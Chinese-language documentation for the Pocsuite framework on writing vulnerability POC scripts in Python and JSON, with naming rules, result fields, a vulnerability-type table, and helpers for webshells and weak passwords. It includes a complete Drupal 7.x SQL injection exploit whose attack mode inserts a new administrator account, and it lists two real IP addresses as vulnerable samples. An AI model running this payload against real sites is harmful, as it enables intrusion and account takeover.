,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---.
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://sebug.net
本小节介绍POC python脚本编写
-
首先新建一个.py文件,文件名应当符合 poc命名规范 :
-
编写POC实现类TestPOC,继承自POCBase类.
#!/usr/bin/env python # -*- coding: utf-8 -*- from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class TestPOC(POCBase): ...
-
填写POC信息字段,所有信息都要认真填写不然不会过审核的
vulID = '1571' # vul ID version = '1' #默认为1 author = 'zhengdt' # POC作者的大名 vulDate = '2014-10-16' #漏洞公开的时间,不知道就写今天 createDate = '2014-10-16'# 编写POC的日期 updateDate = '2014-10-16'#POC更新的时间,默认和编写时间一样 references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']# 漏洞地址来源,0day不用写 name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC'# POC 名称 appPowerLink = 'https://www.drupal.org/'# 漏洞厂商主页地址 appName = 'Drupal'# 漏洞应用名称 appVersion = '7.x'# 漏洞影响版本 vulType = 'SQL Injection'#漏洞类型,类型参考见 漏洞类型规范表 desc = ''' Drupal 在处理 IN 语句时,展开数组时 key 带入 SQL 语句导致 SQL 注入, 可以添加管理员、造成信息泄露。 ''' # 漏洞简要描述 samples = []# 测试样列,就是用POC测试成功的网站
-
编写POC检测代码
def _verify(self): output = Output(self) result = {} #result是返回结果 # 验证代码
'Result':{ 'DBInfo' : {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx' , 'Uid':'xxx' , 'Groupid':'xxx'}, 'ShellInfo': {'URL': 'xxx', 'Content': 'xxx' }, 'FileInfo': {'Filename':'xxx','Content':'xxx'}, 'XSSInfo': {'URL':'xxx','Payload':'xxx'}, 'AdminInfo': {'Uid':'xxx' , 'Username':'xxx' , 'Password':'xxx' } 'Database': {'Hostname':'xxx', 'Username':'xxx', 'Password':'xxx', 'DBname':'xxx'}, 'VerifyInfo':{'URL': 'xxx' , 'Postdata':'xxx' , 'Path':'xxx'} 'SiteAttr': {'Process':'xxx'} }
result各字段意义请参见附录
-
编写攻击模式:
攻击模式可以对目标进行getshell,查询管理员帐号密码等操作.定义它的方法与检测模式类似
def _attack(self): output = Output(self) result = {} # 攻击代码
和验证模式一样,攻击成功后需要把攻击得到结果赋值给result变量。
注意:如果该POC没有攻击模式,可以在 _attack()函数下加入一句 return self._verify() 这样你就无需再写 _attack 函数了。
-
注册POC实现类
在类的外部调用register()方法注册poc类
Class TestPOC(POCBase): #POC内部代码 #注册TestPOC类 register(TestPOC)
-
首先新建一个.json文件,文件名应当符合 poc命名规范
-
poc json有两个key,pocInfo和pocExecute,分别代表poc信息部分执行体。
{ "pocInfo":{}, "pocExecute":{} } ```
-
填写pocInfo部分:
{
"pocInfo":{
"vulID": "poc-2015-0107",
"name": "Openssl 1.0.1 内存读取 信息泄露漏洞",
"protocol": "http",
"author": "test",
"references": ["http://drops.wooyun.org/papers/1381"],
"appName": "OpenSSL",
"appVersion" : "1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1",
"vulType": "Information Disclosure",
"desc" :"OpenSSL是一个强大的安全套接字层密码库。这次漏洞被称为OpenSSL“心脏出血”漏洞,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。安全人员表示:无需任何特权信息或身份验证,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据.",
"samples": ["http://www.baidu.com", "http://www.qq.com"]
},
"pocExecute":{}
}
```
各字段的含义与python属性部分相同。
- 填写pocExecute部分:
pocExecute分为verify和attack两部分
{
"pocInfo":{},
"pocExecute":{
"verify":[],
"attack":[]
}
}
**填写verify部分:**
{
"pocInfo":{},
"pocExecute":{
"verify":[
{
"step": "1",
"method": "get",
"vulPath": "/api.php",
"params": "test=123&sebug=1234",
"necessary": "",
"headers": {"cookie": "123"},
"res": {
"raw": ["baidu","google"],
"time": "time"
}
},
{
"step": "2",
"method": "get",
"vulPath": "/api.php",
"params": "test=sebug",
"necessary": "",
"headers": "",
"res":{
"raw": [],
"time": "0.01"
}
}
],
"attack":[]
}
}
```
>说明:
>step: 按照上下顺序执行,值可以取0和非0两种。如果step的值为0,那么验证成功后就会返回成功,如果step的值不为0,那么需要全部满足后才返回成功。
> method:请求方式
> vulPath:请求路径
> params:请求参数
> necessary:请求中必须存在的数据,例如cookie
> headers:自定义请求头部
> res:返回体,其中:
> > raw:表示字符串匹配,为数组类型,当且仅当raw中所有的元素都匹配成功的情况下,返回True,否则返回False.
> > time:为时间差
> > 当raw和time同时存在时,取raw,time失效。
**verify中每个元素代表一个请求。**
填写attack部分: attack部分和verify部分类似,不再缀述。
Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC:
#!/usr/bin/env python
# coding: utf-8
import urllib
import random
import string
from collections import OrderedDict
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '1571' # vul ID
version = '1'
author = 'zhengdt'
vulDate = '2014-10-16'
createDate = '2014-10-16'
updateDate = '2014-10-16'
references = ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']
name = 'Drupal 7.x /includes/database/database.inc SQL注入漏洞 POC'
appPowerLink = 'https://www.drupal.org/'
appName = 'Drupal'
appVersion = '7.x'
vulType = 'SQL Injection'
desc = '''
Drupal 在处理 IN 语句时,展开数组时 key 带入 SQL 语句导致 SQL 注入,
可以添加管理员、造成信息泄露。
'''
samples = ['http://216.119.147.168/', 'http://69.172.67.176/']
def _attack(self):
result = {}
vul_url = '%s/?q=node&destination=node' % self.url
uid = int(random.random() * 1000)
username = ''.join(random.sample(string.letters+string.digits, 5))
payload = OrderedDict()
if not self._verify(verify=False):
return self.parse_attack(result)
payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \
'\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \
'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \
= 'test'
payload['name[0]'] = 'test2'
payload['pass'] = 'test'
payload['form_id'] = 'user_login_block'
#print urllib.urlencode(payload)
response = req.post(vul_url, data=payload)
if response.status_code == 200:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = username
result['AdminInfo']['Password'] = 'thanks'
return self.parse_attack(result)
def _verify(self, verify=True):
result = {}
vul_url = '%s/?q=node&destination=node' % self.url
payload = {
'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \
'135)),floor(rand(0)*2))x from information_schema.tables group by x' \
')a);;#]': 'test',
'name[0]': 'test2',
'pass': 'test',
'form_id': 'user_login_block',
}
response = req.post(vul_url, data=payload).content
if 'e4f5fd37a92eb41ba575c81bf0d31591' in response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = urllib.urlencode(payload)
return self.parse_attack(result) if verify else 'e4f5fd37a92eb41ba575c81bf0d31591' in response
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
{
"pocInfo": {
"vulID": "poc-2015-0107",
"name": "Openssl 1.0.1 内存读取 信息泄露漏洞",
"protocol": "http",
"author": "test",
"references": ["http://drops.wooyun.org/papers/1381"],
"appName": "OpenSSL",
"appVersion" : "1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1",
"vulType": "Information Disclosure",
"desc" :"OpenSSL是一个强大的安全套接字层密码库。这次漏洞被称为OpenSSL“心脏出血”漏洞,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。安全人员表示:无需任何特权信息或身份验证,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据.",
"samples": ["http://www.baidu.com", "http://www.qq.com"]
},
"pocExecute":{
"verify": [
{
"step": "1",
"method": "get",
"vulPath": "/api.php",
"params": "test=123&shit=1234",
"necessary": "",
"headers": {"cookie": "123"},
"res": {
"raw": ["baidu"],
"time": "time"
}
},
{
"step": "2",
"method": "get",
"vulPath": "/api.php",
"params": "test=shit",
"necessary": "",
"headers": "",
"res":{
"raw": [],
"time": "0.01"
}
}
],
"attack": [
{
"step": "0",
"method": "get",
"vulPath": "/api.php",
"params": "test=attack",
"necessary": "",
"headers": "shit",
"res":{
"raw": [],
"time": ""
}
},
{
"step": "0",
"method": "get",
"vulPath": "/api.php",
"params": "test=attack",
"necessary": "",
"headers": "shit",
"res":{
"raw": [],
"time": ""
}
}
]
}
}
PoC 命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名种的所有字母改成成小写,所有的符号改成_.
文件名不能有特殊字符和大写字母 最后出来的文件名应该像这样
```
_1847_seeyon_3_1_login_info_disclosure.py
```
correspond:[
{ name: 'DBInfo', value:'数据库内容' },
{ name: 'Username', value: '管理员用户名'},
{ name: 'Password', value:'管理员密码' },
{ name: 'Salt', value: '加密盐值'},
{ name: 'Uid', value: '用户ID'},
{ name: 'Groupid', value: '用户组ID'},
{ name: 'ShellInfo', value: 'Webshell信息'},
{ name: 'URL', value: 'Webshell地址'},
{ name: 'Content', value: 'Webshell内容'},
{ name: 'FileInfo', value: '文件信息'},
{ name: 'Filename', value: '文件名称'},
{ name: 'Content', value: '文件内容'},
{ name: 'XSSInfo', value: '跨站脚本信息'},
{ name: 'URL', value: '验证URL'},
{ name: 'Payload', value: '验证Payload'},
{ name: 'AdminInfo', value: '管理员信息'},
{ name: 'Uid', value: '管理员ID'},
{ name: 'Username', value: '管理员用户名'},
{ name: 'Password', value: '管理员密码'},
{ name: 'Database', value:'数据库信息' },
{ name: 'Hostname', value: '数据库主机名'},
{ name: 'Username', value:'数据库用户名' },
{ name: 'Password', value: '数据库密码'},
{ name: 'DBname', value: '数据库名'},
{ name: 'VerifyInfo', value: '验证信息'},
{ name: 'URL', value: '验证URL'},
{ name: 'Postdata', value: '验证POST数据'},
{ name: 'Path', value: '网站绝对路径'},
{ name: 'SiteAttr', value: '网站服务器信息'},
{ name: 'Process', value: '服务器进程'}
]
英文名称 | 中文名称 | 缩写 |
Cross Site Scripting | 跨站脚本 | xss |
Cross Site Request Forgery | 跨站请求伪造 | csrf |
SQL Injection | Sql注入 | sql-inj |
LDAP Injection | ldap注入 | ldap-inj |
Mail Command Injection | 邮件命令注入 | smtp-inj |
Null Byte Injection | 空字节注入 | null-byte-inj |
CRLF Injection | CRLF注入 | crlf-inj |
SSI Injection | Ssi注入 | ssi-inj |
XPath Injection | Xpath注入 | xpath-inj |
XML Injection | Xml注入 | xml-inj |
XQuery Injection | Xquery 注入 | xquery-inj |
Command Execution | 命令执行 | cmd-exec |
Code Execution | 代码执行 | code-exec |
Remote File Inclusion | 远程文件包含 | rfi |
Local File Inclusion | 本地文件包含 | lfi |
Abuse of Functionality | 功能函数滥用 | func-abuse |
Brute Force | 暴力破解 | brute-force |
Buffer Overflow | 缓冲区溢出 | buffer-overflow |
Content Spoofing | 内容欺骗 | spoofing |
Credential Prediction | 证书预测 | credential-prediction |
Session Prediction | 会话预测 | session-prediction |
Denial of Service | 拒绝服务 | dos |
Fingerprinting | 指纹识别 | finger |
Format String | 格式化字符串 | format-string |
HTTP Response Smuggling | http响应伪造 | http-response-smuggling |
HTTP Response Splitting | http响应拆分 | http-response-splitting |
HTTP Request Splitting | http请求拆分 | http-request-splitting |
HTTP Request Smuggling | http请求伪造 | http-request-smuggling |
HTTP Parameter Pollution | http参数污染 | hpp |
Integer Overflows | 整数溢出 | int-overflow |
Predictable Resource Location | 可预测资源定位 | res-location |
Session Fixation | 会话固定 | session-fixation |
URL Redirector Abuse | url重定向 | redirect |
Privilege Escalation | 权限提升 | privilege-escalation |
Resolve Error | 解析错误 | resolve-error |
Arbitrary File Creation | 任意文件创建 | file-creation |
Arbitrary File Download | 任意文件下载 | file-download |
Arbitrary File Deletion | 任意文件删除 | file-deletion |
Backup File Found | 备份文件发现 | bak-file-found |
Database Found | 数据库发现 | db-found |
Directory Listing | 目录遍历 | dir-listing |
Directory Traversal | 目录穿越 | dir-traversal |
File Upload | 文件上传 | file-upload |
Login Bypass | 登录绕过 | login-bypass |
Weak Password | 弱密码 | weak-pass |
Remote Password Change | 远程密码修改 | remote-pass-change |
Code Disclosure | 代码泄漏 | code-disclosure |
Path Disclosure | 路径泄漏 | path-disclosure |
Information Disclosure | 信息泄漏 | info-disclosure |
Security Mode Bypass | 安全模式绕过 | sec-bypass |
Malware | 挂马 | mal |
Black Link | 暗链 | black-link |
Backdoor | 后门 | backdoor |
也可以参见漏洞类型规范
pocsuite提供两个类来快速生成WebShell。具体代码见:lib/utils/webshell.py
WebShell类:
class Webshell:
#基础Webshell类
# @pwd : Webshell密码
# @content: Webshell代码
# @check: 检验代码
# @keyword: 检验特征关键字
__init__(self, pwd='', content='', check='', keyword='')
set_pwd(self, pwd)#设置webshell密码
get_pwd(self) #获取webshell密码
get_content(self) #获取webshell代码
check(self, url) #校验执行结果
VerifyShell类:
class VerifyShell(Webshell):
def __init__(self, content='', keyword=''):
Webshell.__init__(self, content=content, keyword=keyword)
self._check_data = {}
pocsuite中封装了常用的一句话WebShell,默认密码均为cmd。如果需要在页面中直接调用webshell,需要引入webshell类。 如:使用PhpShell类
from lib.utils.webshell import PhpShell
如果需要自定义WebShell,可以继承WebShell类。 如果需要自定义VerifyShell,可以继承VerifyShell类。
引入API:
from lib.utils.password import *
相关API:
#默认返回top前100弱口令
getWeakPassword()
#默认返回top前1000弱口令
getLargeWeakPassword()
#生成密码字典
genPassword(length=8, chars=string.letters+string.digits)
相关的密码文件在 pocsuite/data 目录下,如果需要修改字典位置,可以修改paths.WEAK_PASS属性和paths.LARGE_WEAK_PASS 属性值。
-
检测模式为了防止误报的产生,我们一般使用的让页面输出一个自定义的字符串。
比如:
检测 SQL 注入时,select md5(0x2333333)
if '5e2e9b556d77c86ab48075a94740b6f7' in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url+payload
检测 XSS 漏洞时alert('<0x2333333>')
if '<0x2333333>' in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url+payload
检测 PHP 文件上传是否成功。
if '5e2e9b556d77c86ab48075a94740b6f7' in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url+payload
-
任意文件如果需要知道网站路径才能读取文件的话,可以读取系统文件进行验证,要写 Windows 版和 Linux 版两个版本。
-
检测模式下,上传的文件一定要删掉
-
程序可以通过某些方法获取表前缀,just do it;若不行,保持默认表前缀
-
PoC 编写好后,务必进行测试,测试规则为:5个不受漏洞的网站,确保 PoC 攻击不成功;5个受漏洞影响的网站,确保 PoC 攻击成功。